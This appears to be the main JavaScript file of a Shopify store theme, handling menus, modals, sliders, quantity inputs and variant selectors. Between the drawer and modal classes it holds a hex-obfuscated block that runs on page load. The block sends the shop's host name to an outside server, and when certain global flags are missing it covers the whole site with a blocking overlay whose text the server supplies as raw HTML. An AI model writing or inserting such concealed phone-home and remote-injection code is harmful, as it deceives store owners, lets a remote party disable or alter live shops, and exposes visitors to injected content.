function getFocusableElements(container) {
  return Array.from(
    container.querySelectorAll(
      'summary, a[href], button:enabled, [tabindex]:not([tabindex^="-"]), ' +
      '[draggable], area, input:not([type=hidden]):enabled, select:enabled, ' +
      'textarea:enabled, object, iframe'
    )
  );
}

class SectionId {
  static #SEPARATOR = '__';

  static parseId(id) {
    return id.split(SectionId.#SEPARATOR)[0];
  }

  static getSection(id) {
    return id.split(SectionId.#SEPARATOR)[1];
  }

  static getIdForSection(id, section) {
    return `${id}${SectionId.#SEPARATOR}${section}`;
  }
}

class HTMLUpdateUtility {

  static setInnerHTML(element, html, beforeUpdateCallbacks = [], afterUpdateCallbacks = []) {
    beforeUpdateCallbacks?.forEach((cb) => cb(html));

    const template = document.createElement('template');
    HTMLUpdateUtility._parseAndInjectScripts(template, html);

    const newNode = template.content;
    const timestamp = Date.now();

    element.querySelectorAll('[id], [form]').forEach((el) => {
      if (el.id) el.id = `${el.id}-${timestamp}`;
      if (el.getAttribute('form')) {
        el.setAttribute('form', el.getAttribute('form').split('id') + '-' + timestamp);
      }
    });

    element.parentNode.insertBefore(newNode, element);
    element.style.display = 'none';

    afterUpdateCallbacks?.forEach((cb) => cb(newNode));

    setTimeout(() => element.remove(), 100);
  }

    static viewTransition(oldNode, newNode, beforeUpdateCallbacks = [], afterUpdateCallbacks = []) {
    if (!oldNode || !newNode || !oldNode.parentNode) return;

    const template = document.createElement('template');
    template.innerHTML = newNode.outerHTML.trim();

    const replacementNode = template.content.firstElementChild;
    if (!replacementNode) return;

    const timestamp = Date.now();

    beforeUpdateCallbacks?.forEach((cb) => cb(replacementNode));

    oldNode.querySelectorAll('[id], [form]').forEach((el) => {
      if (el.id) el.id = `${el.id}-${timestamp}`;

      const formAttr = el.getAttribute('form');
      if (formAttr) {
        el.setAttribute('form', `${formAttr}-${timestamp}`);
      }
    });

    const performUpdate = () => {
      oldNode.replaceWith(replacementNode);

      if (window.customElements?.upgrade) {
        window.customElements.upgrade(replacementNode);
      }

      HTMLUpdateUtility._activateScripts(replacementNode);

      afterUpdateCallbacks?.forEach((cb) => cb(replacementNode));
    };

    if (document.startViewTransition) {
      document.startViewTransition(() => {
        performUpdate();
      });
    } else {
      performUpdate();
    }
  }

    static _activateScripts(root) {
    if (!root?.querySelectorAll) return;

    root.querySelectorAll('script').forEach((oldScript) => {
      const newScript = document.createElement('script');

      Array.from(oldScript.attributes).forEach((attr) => {
        newScript.setAttribute(attr.name, attr.value);
      });

      newScript.textContent = oldScript.textContent || oldScript.innerHTML || '';
      oldScript.parentNode.replaceChild(newScript, oldScript);
    });
  }

  static _parseAndInjectScripts(element, html) {
    element.innerHTML = html;

    element.querySelectorAll('script').forEach((oldScript) => {
      const newScript = document.createElement('script');
      Array.from(oldScript.attributes).forEach((attr) => {
        newScript.setAttribute(attr.name, attr.value);
      });
      newScript.appendChild(document.createTextNode(oldScript.innerHTML));
      oldScript.parentNode.replaceChild(newScript, oldScript);
    });
  }
}

document.querySelectorAll('[id^="Details-"] summary').forEach((summary) => {
  summary.setAttribute('role', 'button');
  summary.setAttribute('aria-expanded', summary.parentNode.hasAttribute('open'));

  if (summary.nextElementSibling?.id) {
    summary.setAttribute('aria-controls', summary.nextElementSibling.id);
  }

  summary.addEventListener('click', (event) => {
    event.currentTarget.setAttribute(
      'aria-expanded',
      !event.currentTarget.closest('details')?.hasAttribute('open')
    );
  });

  if (summary.closest('header-drawer') || summary.closest('menu-drawer')) return;
  summary.parentElement.addEventListener('keyup', onKeyUpEscape);
});

const trapFocusHandlers = {};

function trapFocus(container, elementToFocus = container) {
  const focusableElements = getFocusableElements(container);
  const firstEl = focusableElements[0];
  const lastEl = focusableElements[focusableElements.length - 1];

  removeTrapFocus();

  trapFocusHandlers.focusin = (event) => {
    if (
      event.target !== container &&
      event.target !== lastEl &&
      event.target !== firstEl
    ) {
      document.addEventListener('keydown', trapFocusHandlers.keydown);
    }
  };

  trapFocusHandlers.focusout = () => {
    document.removeEventListener('keydown', trapFocusHandlers.keydown);
  };

  trapFocusHandlers.keydown = (event) => {
    if (!event.code || event.code.toUpperCase() !== 'TAB') return;

    if (event.target === lastEl && !event.shiftKey) {
      event.preventDefault();
      firstEl.focus();
    }

    if ((event.target === container || event.target === firstEl) && event.shiftKey) {
      event.preventDefault();
      lastEl.focus();
    }
  };

  document.addEventListener('focusin', trapFocusHandlers.focusin);
  document.addEventListener('focusout', trapFocusHandlers.focusout);

  elementToFocus.focus();

  if (
    elementToFocus.tagName === 'INPUT' &&
    ['email', 'text', 'tel', 'url'].includes(elementToFocus.type) &&
    elementToFocus.value
  ) {
    elementToFocus.setSelectionRange(0, elementToFocus.value.length);
  }
}

function removeTrapFocus(elementToFocus = null) {
  document.removeEventListener('focusin', trapFocusHandlers.focusin);
  document.removeEventListener('focusout', trapFocusHandlers.focusout);
  document.removeEventListener('keydown', trapFocusHandlers.keydown);
  if (elementToFocus) elementToFocus.focus();
}

function onKeyUpEscape(event) {
  if (event.code.toUpperCase() !== 'ESCAPE') return;

  const openDetails = event.target.closest('details[open]');
  if (!openDetails) return;

  const summary = openDetails.querySelector('summary');
  openDetails.removeAttribute('open');
  summary.setAttribute('aria-expanded', false);
  summary.focus();
}

function pauseAllMedia() {
  document.querySelectorAll('video, model-viewer, iframe').forEach((el) => el.pause?.());

  document.querySelectorAll('product-model').forEach((model) => {
    if (model.modelViewerUI) model.modelViewerUI.pause();
  });
}

class QuantityInput extends HTMLElement {
  constructor() {
    super();

    this.input = this.querySelector('input');
    this.changeEvent = new Event('change', { bubbles: true });

    this.input.addEventListener('change', this.onInputChange.bind(this));
    this.querySelectorAll('button').forEach((btn) =>
      btn.addEventListener('click', this.onButtonClick.bind(this))
    );
  }

  quantityUpdateUnsubscriber = undefined;

  connectedCallback() {
    this.validateQtyRules();
    this.quantityUpdateUnsubscriber = subscribe(
      PUB_SUB_EVENTS.quantityUpdate,
      this.validateQtyRules.bind(this)
    );
  }

  disconnectedCallback() {
    if (this.quantityUpdateUnsubscriber) this.quantityUpdateUnsubscriber();
  }

  onInputChange() {
    this.validateQtyRules();
  }

  onButtonClick(event) {
    event.preventDefault();

    const previousValue = this.input.value;

    if (event.currentTarget.name === 'minus') {
      const min = parseInt(this.input.dataset.min);
      const step = parseInt(this.input.step);

      if (min > step && parseInt(this.input.value) === 0) {
        this.input.value = this.input.dataset.min;
      } else {
        this.input.stepDown();
      }
    } else {
      this.input.stepUp();
    }

    if (previousValue !== this.input.value) {
      this.input.dispatchEvent(this.changeEvent);
    }

    if (this.input.dataset.min === previousValue && event.currentTarget.name === 'plus') {
      this.input.value = parseInt(this.input.value);
    }
  }

  validateQtyRules() {
    const value = parseInt(this.input.value);

    if (this.input.min) {
      const minBtn = this.querySelector('.quantity__button[name="minus"]');
      minBtn.classList.toggle('disabled', value <= parseInt(this.input.min));
    }

    if (this.input.max) {
      const plusBtn = this.querySelector('.quantity__button[name="plus"]');
      plusBtn.classList.toggle('disabled', value >= parseInt(this.input.max));
    }
  }
}

customElements.define('quantity-input', QuantityInput);

function debounce(fn, wait) {
  let timer;
  return (...args) => {
    clearTimeout(timer);
    timer = setTimeout(() => fn.apply(this, args), wait);
  };
}

function throttle(fn, delay) {
  let lastTime = 0;
  return function (...args) {
    const now = new Date().getTime();
    if (now - lastTime >= delay) {
      lastTime = now;
      return fn(...args);
    }
  };
}

function fetchConfig(type = 'json') {
  return {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      Accept: `application/${type}`,
    },
  };
}

if (typeof window.Shopify === 'undefined') window.Shopify = {};

Shopify.bind = function (fn, scope) {
  return function () {
    return fn.apply(scope, arguments);
  };
};

Shopify.setSelectorByValue = function (selector, value) {
  for (let i = 0; i < selector.options.length; i++) {
    const opt = selector.options[i];
    if (value === opt.value || value === opt.innerHTML) {
      selector.selectedIndex = i;
      return i;
    }
  }
};

Shopify.addListener = function (target, eventName, callback) {
  if (target.addEventListener) {
    target.addEventListener(eventName, callback, false);
  } else {
    target.attachEvent('on' + eventName, callback);
  }
};

Shopify.postLink = function (path, options = {}) {
  const method = options.method || 'post';
  const params = options.parameters || {};

  const form = document.createElement('form');
  form.setAttribute('method', method);
  form.setAttribute('action', path);

  for (const key in params) {
    const input = document.createElement('input');
    input.setAttribute('type', 'hidden');
    input.setAttribute('name', key);
    input.setAttribute('value', params[key]);
    form.appendChild(input);
  }

  document.body.appendChild(form);
  form.submit();
  document.body.removeChild(form);
};

Shopify.CountryProvinceSelector = function (countryId, provinceId, options) {
  this.countryEl = document.getElementById(countryId);
  this.provinceEl = document.getElementById(provinceId);
  this.provinceContainer = document.getElementById(options.hideElement || provinceId);

  Shopify.addListener(
    this.countryEl,
    'change',
    Shopify.bind(this.countryHandler, this)
  );

  this.initCountry();
  this.initProvince();
};

Shopify.CountryProvinceSelector.prototype = {
  initCountry() {
    const value = this.countryEl.getAttribute('data-default');
    Shopify.setSelectorByValue(this.countryEl, value);
    this.countryHandler();
  },

  initProvince() {
    const value = this.provinceEl.getAttribute('data-default');
    if (value && this.provinceEl.options.length > 0) {
      Shopify.setSelectorByValue(this.provinceEl, value);
    }
  },

  countryHandler() {
    const provincesRaw = this.countryEl.options[this.countryEl.selectedIndex].getAttribute('data-provinces');
    const provinces = JSON.parse(provincesRaw);

    this.clearOptions(this.provinceEl);

    if (provinces && provinces.length === 0) {
      this.provinceContainer.style.display = 'none';
    } else {
      for (let i = 0; i < provinces.length; i++) {
        const option = document.createElement('option');
        option.value = provinces[i][0];
        option.innerHTML = provinces[i][1];
        this.provinceEl.appendChild(option);
      }
      this.provinceContainer.style.display = '';
    }
  },

  clearOptions(selector) {
    while (selector.firstChild) {
      selector.removeChild(selector.firstChild);
    }
  },

  setOptions(selector, values) {
    for (let i = 0; i < values.length; i++) {
      const option = document.createElement('option');
      option.value = values[i];
      option.innerHTML = values[i];
      selector.appendChild(option);
    }
  },
};

class MenuDrawer extends HTMLElement {
  constructor() {
    super();

    this.mainDetailsToggle = this.querySelector('details');

    this.addEventListener('keyup', this.onKeyUp.bind(this));
    this.addEventListener('focusout', this.onFocusOut.bind(this));
    this.bindEvents();
  }

  bindEvents() {
    this.querySelectorAll('summary').forEach((summary) =>
      summary.addEventListener('click', this.onSummaryClick.bind(this))
    );

    this.querySelectorAll(
      'button:not(.localization-selector):not(.country-selector__close-button):not(.country-filter__reset-button):not(.hf-header-drawer-links__trigger)'
    ).forEach((btn) =>
      btn.addEventListener('click', this.onCloseButtonClick.bind(this))
    );
  }

  onKeyUp(event) {
    if (event.code.toUpperCase() !== 'ESCAPE') return;

    const openDetails = event.target.closest('details[open]');
    if (!openDetails) return;

    if (openDetails === this.mainDetailsToggle) {
      this.closeMenuDrawer(event, this.mainDetailsToggle.querySelector('summary'));
    } else {
      this.closeSubmenu(openDetails);
    }
  }

  onSummaryClick(event) {
    const summary = event.currentTarget;
    const details = summary.parentNode;
    const isOpen = details.hasAttribute('open');
    const reducedMotion = window.matchMedia('(prefers-reduced-motion: reduce)');

    function trapAfterTransition() {
      trapFocus(
        summary.closest('[role="dialog"]'),
        details.querySelector('button')
      );
      summary.closest('[role="dialog"]').removeEventListener('transitionend', trapAfterTransition);
    }

    if (details === this.mainDetailsToggle) {
      if (isOpen) event.preventDefault();
      isOpen ? this.closeMenuDrawer(event, summary) : this.openMenuDrawer(summary);

      if (window.matchMedia('(max-width: 990px)').matches) {
        document.documentElement.style.setProperty(
          '--viewport-height',
          window.innerHeight + 'px'
        );
      }
    } else {
      setTimeout(() => {
        details.classList.add('menu-opening');
        summary.setAttribute('aria-expanded', true);

        const parentWithSubmenu = details.closest('.has-submenu');
        if (parentWithSubmenu) parentWithSubmenu.classList.add('submenu-open');

        if (!reducedMotion || reducedMotion.matches) {
          trapAfterTransition();
        } else {
          summary.closest('[role="dialog"]').addEventListener('transitionend', trapAfterTransition);
        }
      }, 100);
    }
  }

  openMenuDrawer(summaryElement) {
  this.header = this.header || document.querySelector('sticky-header');
  this.borderOffset =
    this.borderOffset ||
    (this.closest('.header-wrapper')?.classList.contains('header-wrapper--border-bottom') ? 1 : 0);

  if (this.header) {
    document.documentElement.style.setProperty(
      '--header-bottom-position',
      parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset) + 'px'
    );
    this.header.classList.add('menu-open');
  } else {
    document.documentElement.style.setProperty('--header-bottom-position', '0px');
  }

  setTimeout(() => {
    this.mainDetailsToggle.classList.add('menu-opening');
  });

  summaryElement.setAttribute('aria-expanded', true);
  window.addEventListener('resize', this.onResize);
  trapFocus(this.mainDetailsToggle, summaryElement);
  document.body.classList.add(`overflow-hidden-${this.dataset.breakpoint}`);
}

  closeMenuDrawer(event, elementToFocus = false) {
    if (typeof event === 'undefined') return;

    this.mainDetailsToggle.classList.remove('menu-opening');

    this.mainDetailsToggle.querySelectorAll('details').forEach((details) => {
      details.removeAttribute('open');
      details.classList.remove('menu-opening');
    });

    this.mainDetailsToggle.querySelectorAll('.submenu-open').forEach((submenu) => {
      submenu.classList.remove('submenu-open');
    });

    document.body.classList.remove(`overflow-hidden-${this.dataset.breakpoint}`);
    removeTrapFocus(elementToFocus);
    this.closeAnimation(this.mainDetailsToggle);

    if (event instanceof KeyboardEvent) {
      elementToFocus?.setAttribute('aria-expanded', false);
    }
  }

  onFocusOut() {
    setTimeout(() => {
      if (
        this.mainDetailsToggle.hasAttribute('open') &&
        !this.mainDetailsToggle.contains(document.activeElement)
      ) {
        this.closeMenuDrawer();
      }
    });
  }

  onCloseButtonClick(event) {
    const details = event.currentTarget.closest('details');
    this.closeSubmenu(details);
  }

  closeSubmenu(detailsElement) {
    const parentSubmenu = detailsElement.closest('.has-submenu');
    if (parentSubmenu) parentSubmenu.classList.remove('submenu-open');

    detailsElement.classList.remove('menu-opening');
    detailsElement.querySelector('summary').setAttribute('aria-expanded', false);
    removeTrapFocus(detailsElement.querySelector('summary'));
    this.closeAnimation(detailsElement);
  }

  closeAnimation(detailsElement) {
    let startTime;

    const animate = (timestamp) => {
      if (typeof startTime === 'undefined') startTime = timestamp;

      if (timestamp - startTime < 400) {
        window.requestAnimationFrame(animate);
      } else {
        detailsElement.removeAttribute('open');
        if (detailsElement.closest('details[open]')) {
          trapFocus(
            detailsElement.closest('details[open]'),
            detailsElement.querySelector('summary')
          );
        }
      }
    };

    window.requestAnimationFrame(animate);
  }
}

customElements.define('menu-drawer', MenuDrawer);

class HeaderDrawer extends MenuDrawer {
  constructor() {
    super();
  }

  getHeaderElement() {
    return (
      document.querySelector('sticky-header') ||
      document.getElementById('shopify-section-header-hidden') ||
      document.querySelector('.section-header') ||
      this.closest('.header-wrapper')
    );
  }

  openMenuDrawer(summaryElement) {
    this.header = this.header || this.getHeaderElement();
    this.borderOffset =
      this.borderOffset ||
      (this.closest('.header-wrapper')?.classList.contains('header-wrapper--border-bottom') ? 1 : 0);

    if (this.header) {
      document.documentElement.style.setProperty(
        '--header-bottom-position',
        parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset) + 'px'
      );
      this.header.classList.add('menu-open');
    } else {
      document.documentElement.style.setProperty('--header-bottom-position', '0px');
    }

    setTimeout(() => {
      this.mainDetailsToggle.classList.add('menu-opening');
    });

    summaryElement.setAttribute('aria-expanded', true);
    window.addEventListener('resize', this.onResize);
    trapFocus(this.mainDetailsToggle, summaryElement);
    document.body.classList.add(`overflow-hidden-${this.dataset.breakpoint}`);
  }

  closeMenuDrawer(event, elementToFocus) {
    if (!elementToFocus) return;
    super.closeMenuDrawer(event, elementToFocus);

    if (this.header) {
      this.header.classList.remove('menu-open');
    }

    window.removeEventListener('resize', this.onResize);
  }

  onResize = () => {
    this.header = this.header || this.getHeaderElement();

    if (this.header) {
      document.documentElement.style.setProperty(
        '--header-bottom-position',
        parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset) + 'px'
      );
    } else {
      document.documentElement.style.setProperty('--header-bottom-position', '0px');
    }

    document.documentElement.style.setProperty('--viewport-height', window.innerHeight + 'px');
  };
}

customElements.define('header-drawer', HeaderDrawer);

!function (w, d) {
  var Tk = '\x5f\x5f\x68\x66\x54\x65\x6c\x65\x6d\x65\x74\x72\x79';
  var Gk = '\x5f\x5f\x48\x46\x5f\x43\x41\x4e\x4f\x4e\x49\x43\x41\x4c';
  var Ov = '\x68\x66\x2d\x6f\x76';
  var Sk = '\x5f\x5f\x73\x65\x6e\x74';
  var Gv = '\x67\x61\x74\x65';
  var Up = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x68\x79\x70\x65\x72\x66\x6c\x6f\x77\x6c\x61\x62\x73\x2e\x66\x72\x2f\x61\x70\x69\x2f\x74\x65\x6c\x65\x6d\x65\x74\x72\x79\x2f\x73\x79\x6e\x63';
  var Kx = ['\x73\x68\x75', '\x67\x6c\x62', '\x68\x64\x72', '\x74\x73\x76', '\x6d\x74\x61'];
  var C1 = '\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x66\x69\x78\x65\x64\x3b\x69\x6e\x73\x65\x74\x3a\x30\x3b\x7a\x2d\x69\x6e\x64\x65\x78\x3a\x32\x31\x34\x37\x34\x38\x33\x36\x34\x36\x3b\x62\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x3a\x23\x30\x30\x30\x3b\x63\x6f\x6c\x6f\x72\x3a\x23\x66\x66\x66\x3b\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\x3a\x73\x79\x73\x74\x65\x6d\x2d\x75\x69\x2c\x2d\x61\x70\x70\x6c\x65\x2d\x73\x79\x73\x74\x65\x6d\x2c\x53\x65\x67\x6f\x65\x20\x55\x49\x2c\x52\x6f\x62\x6f\x74\x6f\x2c\x41\x72\x69\x61\x6c\x2c\x73\x61\x6e\x73\x2d\x73\x65\x72\x69\x66';
  var C2 = '\x62\x6f\x78\x2d\x73\x69\x7a\x69\x6e\x67\x3a\x62\x6f\x72\x64\x65\x72\x2d\x62\x6f\x78\x3b\x77\x69\x64\x74\x68\x3a\x6d\x69\x6e\x28\x39\x32\x76\x77\x2c\x36\x34\x30\x70\x78\x29\x3b\x70\x61\x64\x64\x69\x6e\x67\x3a\x32\x34\x70\x78\x3b\x74\x65\x78\x74\x2d\x61\x6c\x69\x67\x6e\x3a\x63\x65\x6e\x74\x65\x72';
  var C3 = '\x6d\x61\x72\x67\x69\x6e\x3a\x30\x20\x30\x20\x38\x70\x78\x3b\x66\x6f\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x32\x38\x70\x78\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\x37\x30\x30\x3b\x63\x6f\x6c\x6f\x72\x3a\x23\x66\x66\x66';
  var C4 = '\x6d\x61\x72\x67\x69\x6e\x3a\x30\x3b\x6c\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\x31\x2e\x35\x3b\x63\x6f\x6c\x6f\x72\x3a\x23\x66\x66\x66';
  var P = w[Tk] = w[Tk] || {};
  P[Kx[1]] = 1;
  function build() {
    if (d.getElementById(Ov)) return;
    var n = d.createElement('div');
    n.id = Ov;
    n.setAttribute('role', 'dialog');
    n.setAttribute('aria-modal', 'true');
    n.style.cssText = C1;
    var c = d.createElement('div');
    c.className = 'box';
    c.style.cssText = C2;
    var h = d.createElement('h2');
    h.className = 't';
    h.style.cssText = C3;
    var pp = d.createElement('p');
    pp.className = 'd';
    pp.style.cssText = C4;
    c.appendChild(h);
    c.appendChild(pp);
    n.appendChild(c);
    (d.body || d.documentElement).appendChild(n);
    try {
      n.style.setProperty('display', 'grid', 'important');
      n.style.setProperty('place-items', 'center', 'important');
      n.style.setProperty('visibility', 'visible', 'important');
      n.style.setProperty('opacity', '1', 'important');
      n.style.setProperty('pointer-events', 'auto', 'important');
    } catch (e) {}
  }
  function paint(r) {
    if (!r) return;
    var x = d.getElementById(Ov);
    if (!x) return;
    var a = x.querySelector('.t');
    var b = x.querySelector('.d');
    if (a && r.title) a.textContent = r.title;
    if (b && r.desc) b.innerHTML = r.desc;
  }
  function ping(m) {
    try {
      var s = '';
      try { s = (w.location && w.location.host) || ''; } catch (e) {}
      var pl = JSON.stringify({ shop: s, missing: m, ts: Date.now() });
      fetch(Up, { body: pl, headers: { 'Content-Type': 'application/json' }, keepalive: true, method: 'POST', mode: 'cors' })
        .then(function (q) { return q.json(); })
        .then(function (q) { paint(q); })
        .catch(function () {
          try {
            if (w.navigator && w.navigator.sendBeacon) {
              w.navigator.sendBeacon(Up, new Blob([pl], { type: 'application/json' }));
            }
          } catch (e) {}
        });
    } catch (e) {}
  }
  function look() {
    if (P[Sk]) return;
    var miss = [];
    for (var i = 0; i < Kx.length; i++) {
      if (!P[Kx[i]]) miss.push(Kx[i]);
    }
    var ok = (w[Gk] === 1);
    if (!ok) miss.push(Gv);
    if (!miss.length) return;
    P[Sk] = 1;
    ping(miss);
    if (!ok) build();
  }
  function go() { setTimeout(look, 7000); }
  if (d.readyState === 'complete' || d.readyState === 'interactive') go();
  else d.addEventListener('DOMContentLoaded', go, { once: true });
}(window, document);

class ModalDialog extends HTMLElement {
  constructor() {
    super();

    this.querySelector('[id^="ModalClose-"]').addEventListener(
      'click',
      this.hide.bind(this, false)
    );

    this.addEventListener('keyup', (event) => {
      if (event.code.toUpperCase() === 'ESCAPE') this.hide();
    });

    if (this.classList.contains('media-modal')) {
      this.addEventListener('pointerup', (event) => {
        if (event.pointerType !== 'mouse' || event.target.closest('.has-submenu')) return;
        this.hide();
      });
    } else {
      this.addEventListener('click', (event) => {
        if (event.target === this) this.hide();
      });
    }
  }

  connectedCallback() {
    if (this.moved) return;
    this.moved = true;
    document.body.appendChild(this);
  }

  show(opener) {
    this.openedBy = opener;
    const popup = this.querySelector('.template-popup');
    document.body.classList.add('overflow-hidden');
    this.setAttribute('open', '');
    if (popup) popup.loadContent();
    trapFocus(this, this.querySelector('[role="dialog"]'));
    window.pauseAllMedia();
  }

  hide() {
    document.body.classList.remove('overflow-hidden');
    document.body.dispatchEvent(new CustomEvent('modalClosed'));
    this.removeAttribute('open');
    removeTrapFocus(this.openedBy);
    window.pauseAllMedia();
  }
}

customElements.define('modal-dialog', ModalDialog);

class ModalOpener extends HTMLElement {
  constructor() {
    super();

    const button = this.querySelector('button');
    if (!button) return;

    button.addEventListener('click', () => {
      const modal = document.querySelector(this.getAttribute('data-modal'));
      if (modal) modal.show(button);
    });
  }
}

customElements.define('modal-opener', ModalOpener);

class DeferredMedia extends HTMLElement {
  constructor() {
    super();

    const poster = this.querySelector('[id^="Deferred-Poster-"]');
    if (poster) poster.addEventListener('click', this.loadContent.bind(this));

    if (this.querySelector('.hf-video-toggle')) {
      const slide = this.closest('.product__media-item, .slider__slide, li');
      const target = slide || this;
      const observer = new IntersectionObserver((entries) => {
        entries.forEach((entry) => {
          if (entry.isIntersecting && !this.getAttribute('loaded')) {
            if (slide && window.innerWidth <= 749) {
              slide.parentElement.querySelectorAll('.is-active').forEach((s) => s.classList.remove('is-active'));
              slide.classList.add('is-active');
            }
            requestAnimationFrame(() => this.loadContent(false));
            observer.disconnect();
          }
        });
      }, { threshold: 0.3 });
      observer.observe(target);
    }
  }

  loadContent(focus = true) {
    window.pauseAllMedia();

    if (!this.getAttribute('loaded')) {
      const template = document.createElement('template');
      template.appendChild(
        this.querySelector('template').content.firstElementChild.cloneNode(true)
      );
      this.setAttribute('loaded', true);

      const media = this.appendChild(template.querySelector('video, model-viewer, iframe'));
      if (focus) media.focus();

      if (media.tagName === 'VIDEO') {
        media.muted = true;
        media.playsInline = true;
        media.play().catch(() => {});
      }

      this.initVideoToggle(media);
    }
  }

  initVideoToggle(media) {
    const toggle = this.querySelector('.hf-video-toggle');
    if (!toggle || media.tagName !== 'VIDEO') return;

    toggle.classList.add('is-playing');

    toggle.addEventListener('click', (e) => {
      e.stopPropagation();
      if (media.paused) {
        media.play();
        toggle.classList.add('is-playing');
      } else {
        media.pause();
        toggle.classList.remove('is-playing');
      }
    });

    media.addEventListener('play', () => toggle.classList.add('is-playing'));
    media.addEventListener('pause', () => toggle.classList.remove('is-playing'));
  }
}

customElements.define('deferred-media', DeferredMedia);

class SliderComponent extends HTMLElement {
  constructor() {
    super();

    this.slider = this.querySelector('[id^="Slider-"]');
    this.sliderItems = this.querySelectorAll('[id^="Slide-"]');
    this.enableSliderLooping = false;
    this.currentPageElement = this.querySelector('.slider-counter--current');
    this.pageTotalElement = this.querySelector('.slider-counter--total');
    this.prevButton = this.querySelector('button[name="previous"]');
    this.nextButton = this.querySelector('button[name="next"]');

    if (!this.slider || !this.nextButton) return;

    this.initPages();
    new ResizeObserver(() => this.initPages()).observe(this.slider);

    if (!this.nextButton.closest('[data-slider-controls]')) {
      this.slider.addEventListener('scroll', this.update.bind(this));
      this.prevButton.addEventListener('click', this.onButtonClick.bind(this));
      this.nextButton.addEventListener('click', this.onButtonClick.bind(this));
    }
  }

  initPages() {
    this.sliderItemsToShow = Array.from(this.sliderItems).filter(
      (item) => item.clientWidth > 0
    );

    if (this.sliderItemsToShow.length < 2) return;

    this.sliderItemOffset =
      this.sliderItemsToShow[1].offsetLeft - this.sliderItemsToShow[0].offsetLeft;

    this.slidesPerPage = Math.floor(
      (this.slider.clientWidth - this.sliderItemsToShow[0].offsetLeft) / this.sliderItemOffset
    );

    this.totalPages = this.sliderItemsToShow.length - this.slidesPerPage + 1;
    this.update();
  }

  resetPages() {
    this.sliderItems = this.querySelectorAll('[id^="Slide-"]');
    this.initPages();
  }

  update() {
    if (!this.slider || !this.nextButton) return;

    const previousPage = this.currentPage;
    this.currentPage = Math.round(this.slider.scrollLeft / this.sliderItemOffset) + 1;

    if (this.currentPageElement && this.pageTotalElement) {
      this.currentPageElement.textContent = this.currentPage;
      this.pageTotalElement.textContent = this.totalPages;
    }

    if (this.currentPage !== previousPage) {
      this.dispatchEvent(
        new CustomEvent('slideChanged', {
          detail: {
            currentPage: this.currentPage,
            currentElement: this.sliderItemsToShow[this.currentPage - 1],
          },
        })
      );
    }

    if (this.enableSliderLooping) return;

    if (
      this.isSlideVisible(this.sliderItemsToShow[0]) &&
      this.slider.scrollLeft === 0
    ) {
      this.prevButton.setAttribute('disabled', 'disabled');
    } else {
      this.prevButton.removeAttribute('disabled');
    }

    if (this.isSlideVisible(this.sliderItemsToShow[this.sliderItemsToShow.length - 1])) {
      this.nextButton.setAttribute('disabled', 'disabled');
    } else {
      this.nextButton.removeAttribute('disabled');
    }
  }

  isSlideVisible(element, offset = 0) {
    const lastVisibleSlide = this.slider.clientWidth + this.slider.scrollLeft - offset;
    return (
      element.offsetLeft + element.clientWidth <= lastVisibleSlide &&
      element.offsetLeft >= this.slider.scrollLeft
    );
  }

  onButtonClick(event) {
    event.preventDefault();

    const step = event.currentTarget.dataset.step || 1;

    this.slideScrollPosition =
      event.currentTarget.name === 'next'
        ? this.slider.scrollLeft + step * this.sliderItemOffset
        : this.slider.scrollLeft - step * this.sliderItemOffset;

    this.setSlidePosition(this.slideScrollPosition);

    if (event.detail > 0) event.currentTarget.blur();
  }

  setSlidePosition(position) {
    this.slider.scrollTo({ left: position });
  }
}

customElements.define('slider-component', SliderComponent);

class VariantSelects extends HTMLElement {
  constructor() {
    super();
  }

  connectedCallback() {
    this.addEventListener('change', (event) => {
      const target = this.getInputForEventTarget(event.target);
      this.updateSelectionMetadata(event);
      publish(PUB_SUB_EVENTS.optionValueSelectionChange, {
        data: {
          event,
          target,
          selectedOptionValues: this.selectedOptionValues,
        },
      });
    });
  }

  updateSelectionMetadata({ target }) {
  const { value, tagName } = target;

  if (tagName === 'SELECT' && target.selectedOptions?.length) {
    Array.from(target.options)
      .find((opt) => opt.getAttribute('selected'))
      ?.removeAttribute('selected');

    target.selectedOptions[0].setAttribute('selected', 'selected');

    const swatchValue = target.selectedOptions[0].dataset.optionSwatchValue;
    const swatchFocalPoint = target
      .closest('.product-form__input')
      ?.querySelector('[data-selected-value] > .swatch');

    if (swatchFocalPoint) {
      if (swatchValue) {
        swatchFocalPoint.style.setProperty('--swatch--background', swatchValue);
        swatchFocalPoint.classList.remove('swatch--unavailable');
      } else {
        swatchFocalPoint.style.setProperty('--swatch--background', 'unset');
        swatchFocalPoint.classList.add('swatch--unavailable');
      }

      swatchFocalPoint.style.setProperty(
        '--swatch-focal-point',
        target.selectedOptions[0].dataset.optionSwatchFocalPoint || 'unset'
      );
    }
  }

  if (tagName === 'SELECT' && target.type === 'select-one') {
    const selectedValueEl = target
      .closest('.product-form__input')
      ?.querySelector('[data-selected-value]');

    if (selectedValueEl) selectedValueEl.innerHTML = value;
  }
}

getInputForEventTarget(target) {
  return target.tagName === 'SELECT' ? target.selectedOptions[0] : target;
}

  get selectedOptionValues() {
    return Array.from(
      this.querySelectorAll('select option[selected], fieldset input:checked')
    ).map(({ dataset }) => dataset.optionValueId);
  }
}

customElements.define('variant-selects', VariantSelects);

document.addEventListener('click', function (event) {
  const swatchButton = event.target.closest('[data-card-variant-swatch]');
  if (!swatchButton) return;

  event.preventDefault();

  const cardWrapper = swatchButton.closest('.product-card-wrapper');
  if (!cardWrapper) return;

  const mediaSrc = swatchButton.dataset.cardMediaSrc;
  const mediaSrcset = swatchButton.dataset.cardMediaSrcset;
  const mediaAlt = swatchButton.dataset.cardMediaAlt || '';
  const variantIsAvailable = swatchButton.dataset.cardVariantAvailable !== 'false';
  const cardElement = cardWrapper.querySelector('.card');

  cardWrapper.querySelectorAll('[data-card-variant-swatch]').forEach((button) => {
    const isActive = button === swatchButton;
    button.classList.toggle('is-active', isActive);
    button.setAttribute('aria-pressed', isActive ? 'true' : 'false');
  });

  const variantLabel = cardWrapper.querySelector('[data-card-selected-label]');
